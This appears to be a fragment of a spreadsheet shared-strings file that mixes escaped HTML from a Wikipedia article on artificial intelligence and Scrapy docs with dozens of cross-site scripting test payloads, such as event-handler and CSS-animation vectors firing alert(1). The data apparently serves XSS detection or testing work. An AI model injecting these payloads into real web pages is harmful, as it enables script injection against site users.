    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;18–21 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;header id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/header&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Understand the Scrapy architecture.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onkeypress="alert(1)" contenteditable&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;50–62, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;select id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/select&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;q&gt;These Gödelian anti-mechanist arguments are, however, problematic, and there is wide consensus that they fail. &lt;/q&gt; &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Stanford+Encyclopedia+of+Philosophy&amp;amp;rft.atitle=G%C3%B6del%27s+Incompleteness+Theorems&amp;amp;rft.date=2015-01-20&amp;amp;rft.au=Graham+Oppy&amp;amp;rft_id=http%3A%2F%2Fplato.stanford.edu%2Fentries%2Fgoedel-incompleteness%2F%23GdeArgAgaMec&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;footer ondblclick="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;a id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;A typical AI analyzes its environment and takes actions that maximize its chance of success.&lt;sup id="cite_ref-Definition_of_AI_1-2" class="reference"&gt;&lt;a href="#cite_note-Definition_of_AI-1"&gt;&amp;#91;1&amp;#93; &lt;/a&gt; &lt;/sup&gt; An AI's intended &lt;a href="/wiki/Utility_function" class="mw-redirect" title="Utility function"&gt;utility function (or goal) &lt;/a&gt; can be simple ("1 if the AI wins a game of &lt;a href="/wiki/Go_(game)" title="Go (game)"&gt;Go &lt;/a&gt;, 0 otherwise") or complex ("Do mathematically similar actions to the ones succeeded in the past"). Goals can be explicitly defined or induced. If the AI is programmed for "&lt;a href="/wiki/Reinforcement_learning" title="Reinforcement learning"&gt;reinforcement learning &lt;/a&gt;", goals can be implicitly induced by rewarding some types of behavior or punishing others.&lt;sup id="cite_ref-62" class="reference"&gt;&lt;a href="#cite_note-62"&gt;&amp;#91;a&amp;#93; &lt;/a&gt; &lt;/sup&gt; Alternatively, an evolutionary system can induce goals by using a "&lt;a href="/wiki/Fitness_function" title="Fitness function"&gt;fitness function &lt;/a&gt;" to mutate and preferentially replicate high-scoring AI systems, similar to how animals evolved to innately desire certain goals such as finding food.&lt;sup id="cite_ref-FOOTNOTEDomingos2015Chapter_5_63-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015Chapter_5-63"&gt;&amp;#91;62&amp;#93; &lt;/a&gt; &lt;/sup&gt; Some AI systems, such as nearest-neighbor, instead of reason by analogy, these systems are not generally given goals, except to the degree that goals are implicit in their training data.&lt;sup id="cite_ref-FOOTNOTEDomingos2015Chapter_7_64-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015Chapter_7-64"&gt;&amp;#91;63&amp;#93; &lt;/a&gt; &lt;/sup&gt; Such systems can still be benchmarked if the non-goal system is framed as a system whose "goal" is to successfully accomplish its narrow classification task.&lt;sup id="cite_ref-65" class="reference"&gt;&lt;a href="#cite_note-65"&gt;&amp;#91;64&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite class="citation journal"&gt;Serenko, Alexander; Michael Dohan (2011). &lt;a rel="nofollow" class="external text" href="http://www.aserenko.com/papers/JOI_AI_Journal_Ranking_Serenko.pdf"&gt;"Comparing the expert survey and citation impact journal ranking methods: Example from the field of Artificial Intelligence" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt; &lt;a rel="nofollow" class="external text" href="http://dblp.uni-trier.de/rec/bibtex/conf/iwann/Aleksander95"&gt;BibTex &lt;/a&gt; &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/19970302014628/http://www.ee.ic.ac.uk/research/neural/publications/iwann.html"&gt;Archived &lt;/a&gt; 2 March 1997 at the &lt;a href="/wiki/Wayback_Machine" title="Wayback Machine"&gt;Wayback Machine &lt;/a&gt;. &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="http://image-net.org/challenges/LSVRC/2017/"&gt;"ILSVRC2017" &lt;/a&gt;. &lt;i&gt;image-net.org &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;6 November </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Economics </t>
  </si>
  <si>
    <t>&lt;rb oncontextmenu="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;21, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Engineering_cybernetics" title="Engineering cybernetics"&gt;Engineering cybernetics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;abbr id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onpointerdown=alert(1)&gt;XSS&lt;/dfn&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;param oncopy="alert(1)" contenteditable&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;element draggable="true" ondragleave="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;52–107 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Markov_decision_process" title="Markov decision process"&gt;Markov decision processes &lt;/a&gt; and dynamic &lt;a href="/wiki/Decision_network" class="mw-redirect" title="Decision network"&gt;decision networks &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=www-formal.stanford.edu&amp;amp;rft.atitle=Applications+of+AI&amp;amp;rft_id=http%3A%2F%2Fwww-formal.stanford.edu%2Fjmc%2Fwhatisai%2Fnode3.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;isindex onpointermove=alert(1)&gt;XSS&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;var onpointermove=alert(1)&gt;XSS&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite class="citation book"&gt;&lt;a href="/w/index.php?title=Elaine_Rich&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="Elaine Rich (page does not exist)"&gt;Rich, Elaine &lt;/a&gt; (1983). &lt;span class="cs1-lock-registration" title="Free registration required"&gt;&lt;a rel="nofollow" class="external text" href="https://archive.org/details/ine0000unse"&gt;&lt;i&gt;Artificial Intelligence &lt;/i&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;ul onclick="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;thead id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;div class="section" id="solving-specific-problems"&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onkeydown="alert(1)" contenteditable&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;div id="p-search" role="search"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Terrainability" title="Terrainability"&gt;Terrainability &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Multiprocessing" title="Multiprocessing"&gt;Multiprocessing &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;output id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/output&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Bees_algorithm" title="Bees algorithm"&gt;Bees algorithm &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;main onmouseup="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;span id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;p onmousedown="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;59–189 &lt;/li&gt;</t>
  </si>
  <si>
    <t>Emotion and &lt;a href="/wiki/Affective_computing" title="Affective computing"&gt;affective computing &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;keygen id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;733–736 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Dominicus_Gundissalinus" title="Dominicus Gundissalinus"&gt;Dominicus Gundissalinus &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 7–12 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Optimization_(mathematics)" class="mw-redirect" title="Optimization (mathematics)"&gt;Optimization &lt;/a&gt; searches:</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;tbody style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/tbody&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-371"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-371"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Library_(computing)" title="Library (computing)"&gt;Software library &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT a="&gt;'&gt;" SRC="httx://.rocks/.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFRussellNorvig2009"&gt;Russell &amp;amp; Norvig 2009 &lt;/a&gt;, p.&amp;#160;1. </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;select id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;span onblur=alert(1) tabindex=1 id=x&gt;&lt;/span&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 3.3 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;meter onmouseout="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;dd onbeforepaste="alert(1)" contenteditable&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;ol oncut="alert(1)" contenteditable&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_artificial_intelligence" title="Philosophy of artificial intelligence"&gt;Philosophy of artificial intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onmouseenter="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;span onmousedown="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;svg onkeyup="alert(1)" contenteditable&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;frame onpointerover=alert(1)&gt;XSS&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Category:Philosophy_of_mind" title="Category:Philosophy of mind"&gt;Category &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;rt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;area oncontextmenu="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onpointerenter=alert(1)&gt;XSS&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/item-pipeline.html"&gt;&lt;span class="doc"&gt;Item Pipeline</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;li id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Concern over risk from artificial intelligence has led to some high-profile donations and investments. A group of prominent tech titans including &lt;a href="/wiki/Peter_Thiel" title="Peter Thiel"&gt;Peter Thiel &lt;/a&gt;, Amazon Web Services and Musk have committed $1 billion to &lt;a href="/wiki/OpenAI" title="OpenAI"&gt;OpenAI &lt;/a&gt;, a nonprofit company aimed at championing responsible AI development.&lt;sup id="cite_ref-370" class="reference"&gt;&lt;a href="#cite_note-370"&gt;&amp;#91;359&amp;#93; &lt;/a&gt; &lt;/sup&gt; The opinion of experts within the field of artificial intelligence is mixed, with sizable fractions both concerned and unconcerned by risk from eventual superhumanly-capable AI.&lt;sup id="cite_ref-371" class="reference"&gt;&lt;a href="#cite_note-371"&gt;&amp;#91;360&amp;#93; &lt;/a&gt; &lt;/sup&gt; Other technology industry leaders believe that artificial intelligence is helpful in its current form and will continue to assist humans. Oracle CEO &lt;a href="/wiki/Mark_Hurd" title="Mark Hurd"&gt;Mark Hurd &lt;/a&gt; has stated that AI "will actually create more jobs, not less jobs" as humans will be needed to manage AI systems.&lt;sup id="cite_ref-372" class="reference"&gt;&lt;a href="#cite_note-372"&gt;&amp;#91;361&amp;#93; &lt;/a&gt; &lt;/sup&gt; Facebook CEO &lt;a href="/wiki/Mark_Zuckerberg" title="Mark Zuckerberg"&gt;Mark Zuckerberg &lt;/a&gt; believes AI will "unlock a huge amount of positive things," such as curing disease and increasing the safety of autonomous cars.&lt;sup id="cite_ref-373" class="reference"&gt;&lt;a href="#cite_note-373"&gt;&amp;#91;362&amp;#93; &lt;/a&gt; &lt;/sup&gt; In January 2015, Musk donated $10 million to the &lt;a href="/wiki/Future_of_Life_Institute" title="Future of Life Institute"&gt;Future of Life Institute &lt;/a&gt; to fund research on understanding AI decision making. The goal of the institute is to "grow wisdom with which we manage" the growing power of technology. Musk also funds companies developing artificial intelligence such as &lt;a href="/wiki/DeepMind" title="DeepMind"&gt;DeepMind &lt;/a&gt; and &lt;a href="/wiki/Vicarious_(company)" title="Vicarious (company)"&gt;Vicarious &lt;/a&gt; to "just keep an eye on what's going on with artificial intelligence.&lt;sup id="cite_ref-374" class="reference"&gt;&lt;a href="#cite_note-374"&gt;&amp;#91;363&amp;#93; &lt;/a&gt; &lt;/sup&gt; I think there is potentially a dangerous outcome there."&lt;sup id="cite_ref-375" class="reference"&gt;&lt;a href="#cite_note-375"&gt;&amp;#91;364&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-376" class="reference"&gt;&lt;a href="#cite_note-376"&gt;&amp;#91;365&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;details onmouseup="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onpointerleave=alert(1)&gt;XSS&lt;/tbody&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="//docs.scrapy.org/_/downloads/en/latest/pdf/"&gt;pdf&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNewquist1994"&gt;Newquist 1994 &lt;/a&gt;, pp.&amp;#160;155–183 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;script onpointerup=alert(1)&gt;XSS&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;command ondragover=alert(1) contenteditable&gt;drop here&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;center onkeyup="alert(1)" contenteditable&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;s style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;i onmousemove="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;maschafilm. &lt;a rel="nofollow" class="external text" href="http://www.plugandpray-film.de/en/content.html"&gt;"Content: Plug &amp;amp; Pray Film – Artificial Intelligence – Robots -" &lt;/a&gt;. &lt;i&gt;plugandpray-film.de &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160212040134/http://www.plugandpray-film.de/en/content.html"&gt;Archived &lt;/a&gt; from the original on 12 February 2016. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=plugandpray-film.de&amp;amp;rft.atitle=Content%3A+Plug+%26+Pray+Film+%E2%80%93+Artificial+Intelligence+%E2%80%93+Robots+-&amp;amp;rft.au=maschafilm&amp;amp;rft_id=http%3A%2F%2Fwww.plugandpray-film.de%2Fen%2Fcontent.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;label onmouseout="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;u id=x tabindex=1 onactivate=alert(1)&gt;&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;img draggable="true" ondragleave="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onpointermove=alert(1)&gt;XSS&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Kernel_methods" class="mw-redirect" title="Kernel methods"&gt;kernel methods &lt;/a&gt; such as the &lt;a href="/wiki/Support_vector_machine" class="mw-redirect" title="Support vector machine"&gt;support vector machine &lt;/a&gt; (SVM),&lt;sup id="cite_ref-224" class="reference"&gt;&lt;a href="#cite_note-224"&gt;&amp;#91;h&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Kernel_methods_225-0" class="reference"&gt;&lt;a href="#cite_note-Kernel_methods-225"&gt;&amp;#91;217&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;picture draggable="true" ondrag="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Carbon_nanotube_field-effect_transistor" title="Carbon nanotube field-effect transistor"&gt;Carbon nanotube field-effect transistor &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;command onbeforecopy="alert(1)" contenteditable&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;i style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onmousemove="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;th onmousemove="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Robotic" class="mw-redirect" title="Robotic"&gt;Robotics &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;font onmousemove="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Very_Large_Scale_Integration" title="Very Large Scale Integration"&gt;Very Large Scale Integration &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;figure onmouseenter="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;div class="section" id="scrapy-version-documentation"&gt;</t>
  </si>
  <si>
    <t>&lt;var onpointerenter=alert(1)&gt;XSS&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Research &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/feed-exports.html"&gt;Feed exports&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFKatz2012"&gt;Katz 2012 &lt;/a&gt;. </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI_widely_used-25"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-AI_widely_used_25-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-AI_widely_used_25-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;noscript onpaste="alert(1)" contenteditable&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;form onblur=alert(1) tabindex=1 id=x&gt;&lt;/form&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;frame ondblclick="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">This version is from &lt;a href="#CITEREFSearle1999"&gt;Searle (1999) &lt;/a&gt;, and is also quoted in &lt;a href="#CITEREFDennett1991"&gt;Dennett 1991 &lt;/a&gt;, p.&amp;#160;435. Searle's original formulation was "The appropriately programmed computer really is a mind, in the sense that computers given the right programs can be literally said to understand and have other cognitive states." (&lt;a href="#CITEREFSearle1980"&gt;Searle 1980 &lt;/a&gt;, p.&amp;#160;1). Strong AI is defined similarly by &lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig (2003 &lt;/a&gt;, p.&amp;#160;947): "The assertion that machines could possibly act intelligently (or, perhaps better, act as if they were intelligent) is called the 'weak AI' hypothesis by philosophers, and the assertion that machines that do so are actually thinking (as opposed to simulating thinking) is called the 'strong AI' hypothesis." </t>
  </si>
  <si>
    <t>&lt;colgroup onpointerleave=alert(1)&gt;XSS&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;small id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/small&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Moreover, the application of &lt;a href="/wiki/Personality_computing" title="Personality computing"&gt;Personality computing &lt;/a&gt; AI models can help reducing the cost of advertising campaigns by adding psychological targeting to more traditional sociodemographic or behavioral targeting.&lt;sup id="cite_ref-Celli_et_al._2017_342-0" class="reference"&gt;&lt;a href="#cite_note-Celli_et_al._2017-342"&gt;&amp;#91;331&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Numerical_analysis" title="Numerical analysis"&gt;Numerical analysis &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-66"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-66"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-HintonDengYu2012-248"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-HintonDengYu2012_248-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;big style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onkeyup="alert(1)" contenteditable&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-40"&gt;&lt;a href="#Government"&gt;&lt;span class="tocnumber"&gt;7.5 </t>
  </si>
  <si>
    <t>&lt;pre id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/pre&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Rationalism" title="Rationalism"&gt;Rationalism &lt;/a&gt;&amp;#160;/&amp;#32;&lt;a href="/wiki/Empiricism" title="Empiricism"&gt;Empiricism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;i&gt;&lt;a href="/wiki/Superintelligence:_Paths,_Dangers,_Strategies" title="Superintelligence: Paths, Dangers, Strategies"&gt;Superintelligence: Paths, Dangers, Strategies &lt;/a&gt; &lt;/i&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Customize how pages get requested and downloaded.&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div id="mw-fr-revisiondetails" class="flaggedrevs_short_details" style="display:none"&gt;This is the </t>
  </si>
  <si>
    <t>&lt;head draggable="true" ondragstart="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onpointermove=alert(1)&gt;XSS&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;blink id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;main onmouseleave="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onmousedown="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Mundaneum" title="Mundaneum"&gt;Mundaneum &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;dl&gt;&lt;dt&gt;&lt;i&gt;&lt;a href="/wiki/Computing_Machinery_and_Intelligence" title="Computing Machinery and Intelligence"&gt;Alan Turing's "polite convention" &lt;/a&gt; &lt;/i&gt; &lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;discard onpointermove=alert(1)&gt;XSS&lt;/discard&gt;</t>
  </si>
  <si>
